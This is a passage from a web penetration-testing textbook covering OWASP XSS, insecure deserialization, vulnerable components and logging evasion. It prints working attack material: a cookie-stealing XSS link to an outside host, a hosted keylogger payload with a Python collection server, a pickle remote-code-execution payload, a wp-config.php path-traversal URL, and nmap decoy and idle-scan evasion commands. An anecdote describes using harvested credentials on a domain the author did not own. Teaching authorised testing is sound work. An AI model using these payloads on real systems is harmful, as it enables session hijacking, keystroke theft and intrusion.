There are, however, multiple tools that can reliably find many XSS vulnerabilities, such as our interception proxies and commercial web application vulnerability scanning tools when configured properly. We'll discuss several of these tools and applicable attack scenarios later in this chapter.
The point of contact denied the request to use the obtained credentials, so I focused my attention on other modules, such as a custom dialog box. I used BeEF to produce a prompt asking the user to resubmit his credentials to the application ("Your session is about to expire...") and was able to obtain his username and password; even better than his cookie!
With this information I was able to simply log in to the application as this user, which provided me with an elevated level of privilege. Additional functionality was enabled with this access, and a subsequently identified injection vulnerability eventually provided shell access to the system. From XSS to SQLi to shell; not an entirely uncommon approach, as XSS alone can rarely be parlayed into injection or other direct server-side exploitation.
As for reporting, most XSS injection tools will provide a PDF, HTML, or text-based output file consisting of the attack payload and the resulting response from the server. The problem with the results of the test being delivered in this way is that we can't confirm there is an XSS flaw if the payload doesn't execute in the browser (any browser). Two important takeaways from the last sentence are the concept of the browser executing the code as well as the mention of "any browser". First, many web application scanning tools will report the existence of XSS flaws, provide the applicable HTTP request (with the payload), show the resulting HTTP response (also with the payload), and conclude the application/parameter is vulnerable to XSS based on this result. We then have to take this information and duplicate the finding using our browser to ensure it's not a false positive; just because the payload is present in both the request and response doesn't mean it will execute in the browser. This leads to the next point: the browser is where the payload executes... but what if the browser is actively blocking the execution of the payload? Does this mean the application is not vulnerable? The answer is no. Different browsers have different JavaScript engines, APIs, supported features, and ways of parsing code, meaning a given payload may execute in the Midori and Maxthon web browsers, but not Chrome and Edge. Furthermore, when an application is configured to set the X-XSS-Protection security header to enabled, compatible browsers will enable limited built-in protections against some reflected XSS attacks. In these cases, the underlying application is still vulnerable; however, we need to show the impact, and when only a minute number of actual users could be impacted by the flaw, we have to take that into consideration when calculating the risk ranking of the finding.
In effect, when we use tools to help identify XSS flaws, we still need to manually confirm the finding and, more importantly, weaponize a payload. The string "<script>alert('xss');</script>" is very often used to test for XSS, and in turn makes its way into penetration testing reports as evidence, an example of which is shown in Figure 8.2.
Hovering over the link shows a URL of (separated across multiple lines for readability):
https://evilsite.info/search?query=<script>document.location='
https://cookiecapture.example.com/cookiestealer.php?
cookie='+escape(document.cookie)</script>
When running, we can view the real-time logs depicting what the tool is doing (which URI it is attacking/crawling, the payload it is sending, various headers) and see if/when it identifies a vulnerability. Outputting the results of the testing to a file enables a quick grep (seen in Figure 8.5) to identify the attack strings it is sending: cat LOGS | grep 'attack with'.
The GUI provides a wizard, custom settings, and a nice feature of building
the CLI command based on our preferences in the GUI. We can see this once
we specify our settings and click the "Aim" button as seen in Figure 8.6.
Once vulnerabilities are identified with this tool, we will want to manually provide a payload to exploit the flaw. A great way to do this while sidestepping character restrictions on the vulnerable parameter's input is by specifying our own remote code. By doing so we can pull in an entire library, thousands of lines of code, with one XSS command. This will in turn inject the full exploit into our victim's browser; we do this by specifying the path to our hosted payload. Keep in mind we do need to host the malicious JavaScript somewhere on the web for this to work, yet another reason for a VPS or cloud-hosted server to be included as part of our standard tool-set. Alternatively, in a lab environment, we could simply host the script locally to simulate the same concept. However, know that in a real-world scenario we will need to host the malicious code on an HTTPS-enabled website with a valid TLS certificate to ensure the browser loads the content correctly (as opposed to throwing an untrusted content error and refusing to load the JavaScript). Let's explore injecting a keystroke logger as our payload.
We inject this malicious code into the vulnerable application by using the "src" attribute in our payload and defining the location where the script is hosted. To be clear, the vulnerable website has a form (as depicted in Figure 8.8); we are submitting a script into the form, and subsequently the script will be included as part of the page the victim visits at a later time.
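The submitted payload might look like the following, where keylog.js is a hypothetical path to our hosted keystroke logger:

    <script src="https://evilsite.info/keylog.js"></script>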
Now when the victim user browses to this same web application and submits their name and message, the resulting page loads in their browser and includes our malicious JavaScript. This JavaScript will proceed to log every subsequent keystroke made while on the exploited page. While the payload is persistent (stored in the back-end database and served to unsuspecting visitors), it only executes on this one page on this one web application, until a victim browses somewhere else or closes the browser. The payload works well in this context, and we can see in Burp that each time a key is pressed, a POST request is sent to evilsite.info/log.php (Figure 8.9) with a simple payload of the parameter "k" and the value of the key which was pressed.
At this point we can see the keystroke-logging JavaScript is working as intended, and now we need to focus on logging the results. Using PHP (or most any language we want), we can write a few lines of code to handle the POST request, open and append the results to a file, and account for potential issues. Note that SELinux may be a hurdle, and the "keylog.txt" file referenced in Figure 8.10 will need to be writeable for PHP to be able to write to it.
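The book's handler is written in PHP (Figure 8.10); purely for illustration, a minimal equivalent sketch in Python handling the same "k" parameter could be:

    from http.server import BaseHTTPRequestHandler, HTTPServer
    from urllib.parse import parse_qs

    class LogHandler(BaseHTTPRequestHandler):
        def do_POST(self):
            length = int(self.headers.get("Content-Length", 0))
            fields = parse_qs(self.rfile.read(length).decode())
            with open("keylog.txt", "a") as f:     # file must be writeable
                f.write(fields.get("k", [""])[0])  # append the logged keystroke
            self.send_response(200)
            self.end_headers()

    HTTPServer(("0.0.0.0", 8080), LogHandler).serve_forever()  # high port; no root needed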
Looking at the results of the exploit we can see the payload submitted by
one of the victims.
With this information we can proceed to manually verify the results and craft a suitable payload. The fact that the vulnerability is a reflected GET request makes our job easier, as we can utilize the address bar in our browser to tweak the payload and immediately see the results. This also bodes well as we need the vulnerability to be exploitable via the GET method for our planned email delivery mechanism to work. In the event the vulnerability is found via a POST request, we can often simply convert the POST request to a GET request by examining the contents of the POST payload and reconstructing them as GET parameters. As an aside, when we can convert a POST request to a GET request, this is called a method interchange vulnerability. In order to steal a victim's cookies, our payload can consist of a reference to the vulnerable web application and a redirect request appending all of the available victim cookies for the domain as a string sent to our attacker-controlled web server. To test the code, we can submit a request with an alert box showing the cookies for the domain (as shown in Figure 8.13) of the vulnerable web application: <script>alert(document.cookie);</script>.
We'll add onto this with the redirect code to tell the victim's browser to make a new HTTP request to our server, but in the request, include the cookies the browser has saved for the current web application it is visiting. Once again, to be clear: the victim user browsing to evilsite.info has a session token/cookie (PHPSESSID) denoting that the user is logged into the evilsite.info web application. When the victim receives our crafted XSS attack via email, their browser will load the request to evilsite.info and make a new request to a malicious site of our choosing while including the PHPSESSID cookie from evilsite.info in the new request. In this way we are able to steal the cookie, because it is sent directly to a location of our choosing, from the victim's browser, per our email link containing the malicious request. The redirect payload is shown in Figure 8.14.
At this point we are able to use the compromised cookie to access the application as the victim user. We can do this by using our browser/add-ons to alter our current cookie to the stolen value, or by using our interception proxy to modify the cookie being transmitted to the web application. For instance, navigating to Burp's "Project Options" -> "Sessions" -> "Cookie Jar" section (shown in Figure 8.15) allows us to modify our current PHPSESSID cookie to the new value. Any subsequent requests to evilsite.info will include this compromised cookie value and grant us the same level of privilege as the compromised user/session. Note that once we or the legitimate user logs out of the application, the cookie is no longer valid.
More often than not, attacking the user of an application is not allowed, and in these situations a simple alert box proving the existence of the XSS flaw may actually be sufficient. If the client/business fully grasps XSS and the risks associated with this flaw, then we likely don't need to spend more time crafting a robust exploit, especially if we don't have a target victim for the attack. Conversely, when attacking users is allowed, we need to be prepared to launch more complex attacks such as harvesting credentials, obtaining session tokens, defeating XSRF protections, and directly attacking the browser. Several tools exist to help find XSS flaws, but the onus is on us to create a working payload specific to our target application. In most cases we need a remote location to store our code (or have the victim connect to) in order for our attack to be fruitful. XSS attacks can be potent, but the adoption of content security policies, browser defense mechanisms, and better coding practices/frameworks makes our job more challenging. Because of this, having mature tools and relying on our reproducible methodology are keys to successfully identifying XSS. Once identified, our ability to exploit XSS in a meaningful way relies on our skill set and the quality of our tools, the latter of which can be fleeting. Before conducting any penetration testing we always have explicit written permission, and when we incorporate potent XSS attacks targeting users of the application, we want to make sure this topic has clearly been discussed and included in the rules of engagement.
Chapter 9
OWASP A8:2017 Insecure Deserialization
Details: Insecure deserialization was added to the OWASP top ten for 2017 based on input from the information security community, as we have seen a significant uptick in this type of flaw being exploited, along with its potential for abuse. To understand this flaw, let's take a moment to discuss serialization. To serialize objects or data means to convert them from a form that is less than ideal for transmission into a byte stream (commonly using JSON) that can easily be sent across the wire. Typical objects which are serialized might be arrays of data or binary data structures. The reason these objects are serialized is so they can easily be sent from the client to the server while preserving the structure of the data: the data attributes, elements, and hierarchy. A typical object might look like Figure 9.1.
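As a concrete illustration (with hypothetical field names), the round trip in Python using JSON looks like this:

    import json

    record = {"user": "jsmith", "roles": ["editor"], "prefs": {"theme": "dark"}}

    wire = json.dumps(record)     # serialize: structure flattened into a string
    restored = json.loads(wire)   # deserialize on the receiving end
    assert restored == record     # attributes, elements, and hierarchy preserved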
When untrusted input is deserialized, a crafted payload can cause harm to the application. This should be reminiscent of XXE from the perspective of a vulnerable parser; it should also be reminiscent of injection from the perspective of inserting a malicious payload. Exploiting this flaw can lead to privilege escalation or otherwise bypassing access controls, as well as denial of service and remote code execution. The attack surface for exploiting this flaw consists of client-controlled input which will be serialized and sent to the server. Thus, the way we attack this flaw is by injecting malicious code into an object we can control. Typical places to look for serialized data range from cached storage objects and APIs to cookies, View State, HTTP headers, and parameters.
Identifying insecure deserialization takes effort and builds on our previous work of reconnaissance and mapping. During these phases of our methodology we should have been able to determine the platform, including the programming language(s) being employed by the application. While this flaw is technology agnostic, the way we identify and exploit it is very specific. For Java-based applications there are several indicators of a serialization process being used, such as an HTTP header including "application/x-java-serialized-object", the string rO0 (the letter r, the capital letter O, and the number zero) at the start of base64-encoded data, and a hex signature of AC ED 00 05. For C#/.NET applications we can leverage our proxy and search for a base64-encoded string of "AAEAAAD/////" as well as client-side code containing the strings "TypeObject" and "$type:", as these are all indicators of a serialization process in place. We can also use other previously described tools to help identify components which may be vulnerable to this flaw (such as third-party libraries). If we have access to the source code, as an in-house penetration tester, know that there are additional language-specific checks we can perform.
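Those Java indicators are easy to scan for programmatically; a small Python sketch (the saved response file names are hypothetical):

    import base64

    HEX_SIG = bytes.fromhex("aced0005")      # raw Java serialization magic bytes
    B64_SIG = base64.b64encode(HEX_SIG)[:3]  # b"rO0", the base64 form

    def looks_serialized(body: bytes) -> bool:
        return HEX_SIG in body or B64_SIG in body

    for fname in ("response1.bin", "response2.bin"):  # saved proxy responses
        with open(fname, "rb") as f:
            if looks_serialized(f.read()):
                print(fname, "may contain Java serialized data")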
Next we want to determine which inputs we can modify to alter the resulting serialization process. One way to help determine which input results in modified output is by using Burp's Repeater, akin to ZAP's Open/Resend request editor. By using this tool we can visually see a difference in responses after we make a change to the input, or we can select two requests from the proxy history and choose to send the responses to the Comparer tool in order to accurately identify a change in the serialized output. An example of this is shown in Figure 9.4.
Figure 9.4 Burp's Comparer showing seven color-coded differences between the two responses.
Once we know our input has a measurable impact on the serialized output, we can identify which exact input we need to fuzz. To help with the task of identifying and eventually exploiting this flaw, we can use several Burp extensions: Java Deserialization Scanner (for the PRO version of Burp), Java Serial Killer, and Java Serialized Payloads. By sending the POST request to the Java Deserialization Scanner extension, we can then set the applicable insertion point as we would with an Intruder scan, as seen in Figure 9.5.
Java, PHP, Python, Node.js, .NET, Ruby, and other languages can be susceptible to this type of attack, although the tools we use to exploit each language's specific vulnerabilities will vary. Let's take a look at some examples of full exploitation.
With this information we can try to launch a serialization attack; even without this information we could try blindly. However, in looking at the HTTP response headers (depicted in Figure 9.9) we can see the CGI language is Python, and using this knowledge we can craft a suitable attack.
Figure 9.9 Viewing the HTTP headers and noting the CGI language.
The vulnerable web application takes multiple forms of input via text inputs as well as a file upload feature. We can use our interception proxy to get an idea of what a valid POST request looks like when constructed using the selections from the drop-down menus in the form. In looking at the payload of the POST request, we can see there are four parameters: Date, Record Name, Author, and Recipient. Submitting a request immediately shows the results in the lower portion of the page, with the input name and value in a table format. We can see this in Figure 9.10. Uploading an unformatted file results in a 401 HTTP response, however. While the application is likely using Python, indicators of serialization are in fact not readily evident.
To that end we can write our own Python script, upload it to the application, and, depending on how the application processes it, perhaps get our code to execute. We know that during a serialization attack our input will first be serialized, by us or the application, and then subsequently deserialized in an unsafe manner. We can once again infer whether our attack is making it past the deserialization process, is syntactically correct, and meets the requirements of the application's upload feature based on the responses or errors we receive when uploading the file.
Simply uploading the code described in Figure 9.13 will not suffice, as the function has no way to be called and executed. Thus, we would want to alter our attack to leverage a multi-upload approach in which one file gets uploaded and a second uploaded file references a function in the first to execute the code based on the deserialized construct. Or we could take advantage of the pickling process to define a function which, when deserialized, will be executed. We can see this in Figure 9.14.
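The well-known shape of such a pickle payload, with a hypothetical command, is sketched below; anything that later calls pickle.loads() on it executes the command:

    import os
    import pickle

    class Exploit:
        # pickle invokes __reduce__ during serialization; on deserialization
        # the returned callable is executed with the returned arguments
        def __reduce__(self):
            return (os.system, ("id > /tmp/pwned",))  # hypothetical command

    malicious = pickle.dumps(Exploit())
    pickle.loads(malicious)  # simulates the vulnerable server deserializing our upload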
Chapter 10
OWASP A9:2017 Using Components with Known Vulnerabilities
There is no single dominant web development technology; competing solutions offer their own pros and cons, so that anyone, from individuals to Fortune 500 companies, is free to develop the system that best meets their needs. When discussing open-source software and
technology, we have to understand that a significant amount of software is supporting the web application, from the stack, which we already discussed, to authentication/authorization services, containerization, frameworks, parsers, APIs, microservices, analytics, payment processing gateways, a plethora of third-party code, and underlying technology. This technology directly or indirectly supports the web application we are responsible for testing, and thus the onus is on us to understand and test it for susceptibility to weaknesses.
We can typically leverage the NVD, security advisories, bug trackers, GitHub issue trackers, and the like to thoroughly search for known vulnerabilities in a given set of components. Identifying the components is straightforward for all client-side technology but more challenging for server-side software. There are several automated scanning tools which will help find vulnerabilities based on version numbers, but of the hundreds of thousands of known software vulnerabilities, only a fraction have corresponding checks built into vulnerability scanning tools.
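The searching can be scripted as well; this sketch assumes NVD's public JSON API (services.nvd.nist.gov) and its keywordSearch parameter, so treat the endpoint details as an assumption to verify:

    import requests

    resp = requests.get("https://services.nvd.nist.gov/rest/json/cves/2.0",
                        params={"keywordSearch": "splunk 7.0.1"})  # component from recon
    for item in resp.json().get("vulnerabilities", []):
        cve = item["cve"]
        print(cve["id"], cve["descriptions"][0]["value"][:80])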
Anyone can write software and publicly release it, just as anyone can choose to use that software (with some restrictions), but what happens when no one updates it? What happens when a vulnerability is discovered, and patched, but that patch is never installed? What happens when a business has hundreds of applications, patches them regularly, but is not aware of all dependencies? In each one of these situations there is attack surface. We need to recognize this attack surface, identify applicable flaws, find a matching exploit or write our own, and measure the subsequent risk of the vulnerability. Depending on the criticality of the application and its level of sensitivity, using components with known vulnerabilities can be more devastating than all other entries on the OWASP top ten list. Remember Equifax?
Real-World Dialog: The year 2014 was significant for critical security vulnerabilities being released. Some of the most impactful flaws were Drupalgeddon, ShellShock (the Bash Bug), and Heartbleed. I was a Senior Security Engineer working in the financial sector for a billion-dollar entity and was responsible for, among other things, identifying our company's exposure to these critical vulnerabilities. Heartbleed ended up being the biggest threat for us.
At that time our threat and vulnerability management program was mature enough to provide me with a snapshot of all system vulnerabilities, and Rapid7/Nexpose had released a check for Heartbleed in addition to the publicly available Perl script everyone at the time was using to check for the vulnerability. The overwhelming majority of our servers were running Windows with Microsoft's TLS implementation, which was not vulnerable, but we had a large footprint. We owned/leased a /20 (4,096 external IP addresses), and that did not even include our remotely hosted systems. With over 100 domains, several significant business units, and thousands of servers, workstations, network devices, appliances, printers, and more, the challenge was ensuring we were scanning everything we owned or were otherwise responsible for. At one point during my quest to make sure all of our assets were scanned, I even made the overzealous mistake of actively exploiting Heartbleed, dumping RAM, obtaining credentials, and logging in with those credentials on a domain which was very similar to one we owned but alas was not ours (oops).
By the time three days had elapsed since the original public release of the vulnerability, my team and I felt confident the enterprise was not at risk, since all known Heartbleed vulnerabilities (however limited) on internal systems had been patched, and externally available systems were scanned and found to not be vulnerable...or so we thought. The next day we learned of our oversight. Working on the enterprise security team, my colleagues and I were responsible for making sure all business units under the corporate umbrella were included in regular scanning. One business unit, however, was not being completely scanned, at least not by my team. A client/user of this business unit's services (just a regular person on the internet) made the discovery by using the same Perl script to exploit the OpenSSL implementation on a WAF. He took a screenshot, sent it in an email to the business's general contact mailbox, and that message quickly made its way through the process of escalations until reaching the president of the company, as well as all C-level executives and subsequently my team's email distribution list. It was an epic fail on the part of enterprise security. How could we scan everything for multiple days and miss this? The impact to the business was nonexistent, as there was no evidence of abuse, but the impact to my team's reputation was real.
At the same time, my previous employer was mostly a Linux shop and fared MUCH worse, as they had just over 500 publicly exposed servers running the vulnerable OpenSSL version. In the days and weeks that followed the public release of Heartbleed, one could always tell who was impacted by looking at the SSL certificate's date of issue; if it was issued within the last week, that was a pretty clear indicator that the system had been vulnerable and proper remediation had taken place.
We in the information security community, and more broadly as a society, don't have a history
of blaming the victim when a 0day is used, and of course the very nature of a 0day means there is no signature for it. Hence known vulnerabilities are what we need to focus our attention on, as we can usually identify them with ease. In most cases we do this by using a vulnerability scanning tool and other automated scanning solutions. Before we discuss tool usage, let's revisit our luxury of time as it relates to 0day vulnerabilities. There will be times when we are sufficiently motivated (halfway through an engagement with no access to any systems) to focus attention on discovering a new vulnerability. The 0day terminology is generally reserved for previously undisclosed vulnerabilities with the potential for great impact (not necessarily reflected XSS on a homegrown app with a minimal user base), but any new vulnerability we discover can still be used as part of our engagement and responsibly disclosed to the vendor. Finding vulnerabilities in software components is usually accomplished by reviewing the source code (in open-source projects, for example) and identifying criteria that cause the software to malfunction, or by other fuzzing techniques. While time-intensive (between identifying an error condition and crafting a suitable and reliable attack), exploring new vulnerabilities can be fruitful and is certainly a skill set to sharpen.
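To make the fuzzing idea concrete, a bare-bones mutation fuzzer can be just a loop that corrupts a known-good input and watches for crashes. The Python sketch below targets a hypothetical local binary named ./parser that reads a request on stdin; the binary, seed input, and iteration count are all illustrative assumptions.

import random
import subprocess

SEED = b"GET /index.html HTTP/1.1\r\nHost: localhost\r\n\r\n"

def mutate(data):
    # Flip a handful of random bytes in the seed input.
    buf = bytearray(data)
    for _ in range(random.randint(1, 8)):
        buf[random.randrange(len(buf))] = random.randrange(256)
    return bytes(buf)

for i in range(10000):
    sample = mutate(SEED)
    # ./parser is a hypothetical target reading from stdin.
    proc = subprocess.run(["./parser"], input=sample,
                          capture_output=True, timeout=5)
    if proc.returncode < 0:  # negative = killed by a signal (e.g., SIGSEGV)
        print(f"crash on iteration {i}; saving test case")
        with open(f"crash_{i}.bin", "wb") as f:
            f.write(sample)

Real fuzzing frameworks add coverage feedback, corpus management, and crash triage, but the core loop is no more complicated than this.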
Oftentimes discovering new vulnerabilities is not necessary, however, as there are enough application layer vulnerabilities to take advantage of. Using a vulnerability scanning tool is a great way to find these; enter Nikto. Nikto is a free tool written in Perl that we can use to scan web applications for thousands of potential issues. Nikto is not a full-featured web application vulnerability scanning solution, but it is free, it works well, it is updated regularly, and it is mature (reliable) software. For these reasons it is a go-to tool for gaining an initial idea of the attack surface of an application. As a CLI tool we invoke it by specifying nikto.pl -host https://evilsite.info, but not before changing the default user agent.
Nikto is not designed to be stealthy; in fact, by default it will send a user agent string clearly identifying itself to the target system, and because of this, it will be blocked by any properly tuned IPS/WAF. It's not uncommon for someone new to the tool to run it, get no results, and be oblivious to the fact that the scans were all being blocked by an intermediary device. If Nikto is installed as part of our OS, then /etc/nikto.conf is the location of the configuration file we need to edit. Likewise, if we download the tool, then the nikto.conf file located in the downloaded archive will be the file we need to modify to alter the user agent string. We can see this in Figure 10.1.
A quick way to obtain a common user agent string is by using our browser to conduct a web search for "what is my user agent", copying the resulting string, and pasting it into the appropriate section of Nikto's configuration file. We can just as easily tell Nikto which agent to use at runtime via the -useragent switch; the takeaway is to never use the default agent. This process is depicted in Figures 10.2 and 10.3.
Figure 10.3 Modifying Nikto's configuration file to change the user agent.
Running the tool produces output on the command line conveying identified issues. The tool will always mention missing security headers, which are useful for client-side attacks. In addition, Nikto will communicate the path on the server where the issue was discovered, which makes reproducing the finding easier. We definitely need to manually verify the results, as Nikto, like other tools, will produce false positives, such as incorrectly identifying vulnerabilities or incorrectly keying off of HTTP 200 response codes. There are a multitude of configuration options we can modify to get more targeted results; running nikto.pl -H will output an extended help menu showing the various options available. Outputting scan results to a file with the -o option is useful, as is running the tool through a proxy to help see what traffic it is submitting, as well as enabling evasion, tweaking the max timeout, and specifying a hard stop time for the scan. Figure 10.4 shows the results of a Nikto scan.
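Putting those options together, an invocation might look like the following; the target, user agent value, proxy address, and output file name are placeholders, while the flags themselves are standard Nikto options:

nikto.pl -host https://evilsite.info -useragent "Mozilla/5.0 (Windows NT 10.0; Win64; x64)" -useproxy http://127.0.0.1:8080 -o nikto-results.txt -maxtime 2h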
The initial Nikto scan didn't find much, but it also didn't spider the site, an important piece of information we should be aware of. In fact, in looking at our interception proxy (if configured to do so) or HTTP access logs, we can see Nikto spends lots of time making lots of requests for default file names (we can see this in Figure 10.6) and does not provide robust coverage for testing the OWASP top ten, for example.
Nikto is quite useful for finding files indicative of compromise or poorly configured application components, but it is limited in what it searches for; another tool to explore is Wapiti. Wapiti is another free tool, this time written in Python 3, which has support for identifying file inclusion vulnerabilities, command execution, and injection vulnerabilities, as well as more typical issues like XSS and certain misconfigurations. We can run Wapiti just as easily as Nikto with simple command execution from our terminal. An example of doing so is shown in Figure 10.7.
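For reference, a representative invocation looks something like the following; the target URL is a placeholder, and the available module names vary between Wapiti versions, so consult the tool's help output on your install:

wapiti -u http://evilsite.info/ -m "xss,exec,file,sql" -o wapiti-report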
This time when we examine the HTTP access logs to see what requests Wapiti made, we note there are only four; not particularly indicative of a thorough test. We can see this in Figure 10.8.
The reason for this is that there are no parameters included with the request, and the home page for evilsite.info was essentially a blank page. The reason it is important to see a lack of useful findings is to make it clear that tools are often very close to useless if we don't configure them correctly and know how they work.
Focusing on evilsite.info, performing some initial recon to help guide tools like Wapiti during their scanning process can be accomplished with archive.org, web searches, and forced browsing. We are looking for the existence of other folders and pages on the website. Archive.org made several archives of the website throughout the years, and it looks like evilsite.info was used for various phishing campaigns. Search engine queries don't return any useful results, but guessing directories with a forced browse attack does reveal several potentially useful directories. By manually browsing to /xss.php we can see what looks to be a training environment with a vulnerable form. Pointing Wapiti to this form and providing a base GET request (submitting the form presented on the page) results in the tool finding one XSS flaw, which we can see in Figure 10.9.
Identifying component versions and checking them against public vulnerability databases is often the most direct way to find vulnerabilities. Additionally, we will make heavy use of public resources to glean more details about a given flaw as it pertains to example attacks, exploit code, and our research efforts. With this knowledge and exposure to a couple of potentially useful tools, let's cover some examples of how to exploit applications using components with known vulnerabilities.
Examples: WordPress is a popular CMS for which many people have written plugins, many of which are known to be vulnerable. When testing a WordPress application and discovering a known vulnerable component, one of our first instincts may be to search Metasploit for a matching exploit. Doing so usually leads to disappointment: a search for WordPress exploits yields fewer than seven for all of 2018. A more appropriate approach to identifying and subsequently exploiting WordPress vulnerabilities is a combination of WPScan (a tool designed specifically to find WordPress vulnerabilities) and the Exploit Database. We can invoke WPScan from within Kali with a succinct command of wpscan --url http://evilsite.info/blog. The results of this scan will usually reveal outdated plugins and specific vulnerabilities based on the identified version number of the install (see Figure 10.10).
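If the default scan output is sparse, we can also ask WPScan to enumerate components explicitly; for example, the following (with a placeholder URL) requests enumeration of popular plugins and users:

wpscan --url http://evilsite.info/blog --enumerate p,u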
With this information we can scour exploit-db.com looking for exploit code. In doing so, based on version 1.0.11 of the Ad Manager Wd plugin, we can see that with a simple GET request we can execute an arbitrary file download. With this information, access to the wp-config.php file is granted via the HTTP GET request referenced below and depicted in Figure 10.11.
http://evilsite.info/blog/wp-admin/edit.php?post_type=wd_ads_ads&export=export_csv&path=../wp-config.php
The scan results for the identified Tomcat install include a reference link (Figure 10.15) which, when we follow it, leads to a list of Tomcat vulnerabilities based on the different versions.
From this list we are shown a link to the CVE, which in turn shows us the link to the Exploit Database where the exploit code resides. Not to be overlooked are the various mailing lists and links to other relevant discussions and background information on the CVE. We want to have a thorough understanding of what the flaw is, how it can be exploited, and what prerequisites are required. This is crucial because we want more than cursory information about the vulnerability prior to vetting the exploit code, which is shown in Figure 10.16.
What should be clear from this dialog is that we don't run a scan, find a CVE, search for random exploit code, and execute it against our client's environment. Instead we vet the code from a trusted source, executing it in a test environment after adequate research. Short of doing so we may end up creating a DoS condition, exposing sensitive information to an attacker, or worse. Professionalism matters. Proceeding with our research into this CVE and exploit code, we want to confirm the version of the vulnerable software component matches the version the exploit says it targets. From there we
manually review the exploit code and ideally set up a target/test environment with the vulnerable version of the software. Even if we don't have the matching vulnerable software available in a test capacity, we can still test the exploit code against a suitable target to help ensure it does what we think it will do. We can see the Apache logs showing the results of executing the exploit in Figure 10.17.
Once vetted, we can launch the exploit against our target environment and be greeted with a means to execute commands on the remote system via a web shell. In some cases, we will need to modify the exploit code to suit our needs or otherwise get the code to work in our specific situation.
Looking back at the initial Nessus scan results reveals that the scanner may have missed several vulnerabilities. This is not uncommon, but it can take effort to try to determine which flaws exist but are not reported. Looking at HTTP response headers shows that one of the applications running on evilsite.info appears to be Tomcat, as previously identified, but a closer inspection of default configuration files identified with Nikto shows that one of the underlying applications may be running Apache Struts, as shown in Figure 10.18.
OWASP A10:2017
Insufficient Logging and
Monitoring
Definition: Insufficient logging and monitoring, coupled with missing or ineffective integration with incident response, allows attackers to further attack systems, maintain persistence, pivot to more systems, and tamper with, extract, or destroy data. Most breach studies show time to detect a breach is over 200 days, typically detected by external parties rather than internal processes or monitoring.
Details: Writing software takes time, effort, and patience, especially when debugging. The best information at every developer's disposal to help with this process is logs. Logs are so important to the software development process that there are typically levels of verbosity we can configure to display more information in log output when needed. We see this in the tools we use as penetration testers. If we try to download something with wget and receive an error, we can invoke the -d flag to enable debugging. In sqlmap, tcpdump, and nmap we can invoke -v(v)(v) to get a clearer picture of what the tool is doing, what it is seeing, and what is causing an error, respectively. With Apache, IIS, Nginx, and every programming language we have discussed (and the ones not mentioned), as well as every software component, we have the ability to log information.
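To make the leveled-verbosity idea concrete, here is a minimal sketch using Python's standard logging module; the logger name and events are invented for illustration, but the same pattern exists in virtually every language and server mentioned above.

import logging

# INFO for normal runs; drop the level to DEBUG when troubleshooting.
logging.basicConfig(
    level=logging.INFO,
    format="%(asctime)s %(levelname)s %(name)s: %(message)s",
)
log = logging.getLogger("webapp.auth")

def login(username, ok):
    log.debug("raw login request for %r", username)  # verbose detail
    if ok:
        log.info("successful login for %s", username)
    else:
        # Failed logins are exactly the events an alerting
        # pipeline should key off of.
        log.warning("failed login for %s", username)

login("jsmith", False)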
As we proceed to exploit the first nine most critical web application vulnerabilities, it will behoove us to take meticulous notes, because a typical SQL injection attack may result in multiple findings if we later discover that there were no logs associated with our attacks.
How to Exploit: The impact, and even the ability to successfully exploit, every vulnerability we have discussed so far in this book could have been reduced or thwarted with proper logging and alerting. With this understanding, and given the nature of this flaw, it may seem counterintuitive to expend effort being stealthy with our attacks. The reality is that we don't know what we don't know, and crafting attacks which do not trigger alerts is something we typically can't plan for without knowing the details of the target infrastructure. The rules of engagement, however, are what we can rely on to help guide our decision making as we engage the client or business. Communicating with the business to determine if our attack traffic should trigger alerts, and then confirming what certain attacks actually do, is a valuable conversation to have to help the business tune its security systems. Likewise, if the concept of specifically testing this control is not brought up with the business, then we can proceed to attack as normal. The way we exploit a poor logging
and alerting flaw is by attempting to evade detection and ensuring our attack traffic doesn't raise alarms, but, of course, it is more complicated than that. Primarily it is more complicated because of our lack of knowledge about the infrastructure, and also because the business can fail this check even if the right things are being logged and alerted on (if people are not reviewing and responding to the alerts). For these reasons, the way we exploit this flaw can morph into a series of specific attack scenarios where we coordinate with the business on what and when we are testing, and they provide evidence of logs and alerts correlating to our attacks. This means that part of our final report will include screenshots provided by the client showing/proving they were aware of the attack, able to respond to it, and able to take appropriate action, in the event the client can provide this.
As we conduct our penetration testing following our normal methodology, our actions will be blocked, logged, or will successfully penetrate the application/organization without triggering any alerts. Unless specifically guided to do so based on what was previously discussed, there is no need to alter our process or do anything special to test for insufficient logging and monitoring. This assumes we are conducting a thorough test, properly noting our attack timing, and professionally engaging in ethical attacks. With that, let's talk about what it looks like to exploit this flaw, and deepen our understanding of coordinating with the business to measure a failure versus a success of this vulnerability and the applicable security control, respectively.
Standing up a SIEM is expensive: licensing the system, paying for terabytes of storage, and staffing salaried positions to operate the solution can cost millions of dollars, which does not factor in maintenance contracts and other team members' time to get the most out of the system. Because of this it is not uncommon to see SIEM integration fall into one of three categories: large enterprises fully vested in their SOC's success, large enterprises with a contractual obligation to have a SIEM in order to check an audit box, and finally the "other" category, which either has no SIEM or only has components of a SIEM at various stages of implementation. The first category can be exploited due to being too large, too complex, and too disparate; despite their best intentions, things will get missed and not all applications will be configured to produce useful logs that could aid in thwarting attacks. The second category can be exploited due to a lack of expertise, oversight, and minimal coverage. The company wants to pay to log what's contractually obligated, but neglects other systems as it would raise the price, which results in our attacks on other systems going unnoticed, and subsequently compromised hosts being used as pivot points to the high-risk targets. We can successfully exploit the third category due to a lack of complete coverage or only rudimentary alerting being implemented, resulting in some alerts being generated but no one being notified. In the event we do need or want to reduce the noise our attacks create and our likelihood of detection, some of our tools can provide us with options to be more clandestine, just as our techniques can be altered to evade.
This first example uses nmap. Other than adjusting timing (such as the delay between packets), we can alter the source IP/port that packets will appear to be sent from, as well as append custom payloads to packets and utilize proxy chaining. We can see some of these options in Figure 11.1.
Some of these options merely disguise the source of our probes and thus don't trigger an alert. For example, using nmap with -D (decoy scan) simply spoofs some of the source IP addresses nmap will send; of course, responses from the target system to those spoofed addresses will never reach our interface, since this technique merely attempts to bypass scan detection filters. Nmap does have a more interesting zombie (or idle) scan, which uses different and more complex means to the same end. This is interesting and useful, but when used to probe internet-facing systems, it's not typical for a SOC to be alerted and respond to every port scan; in the industry this is referred to as rain on the umbrella. On the internal network, post exploitation, is where such evasion techniques will prove to be invaluable, as an internal sensor detecting a port scan from a non-scan engine likely would warrant further investigation.
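As a concrete illustration, the following invocations use standard nmap evasion options; the decoy addresses, zombie host, and target name are placeholders:

nmap -D 10.1.1.5,10.1.1.9,ME --scan-delay 5s -g 53 target.evilsite.info
nmap -sI zombie.evilsite.info target.evilsite.info

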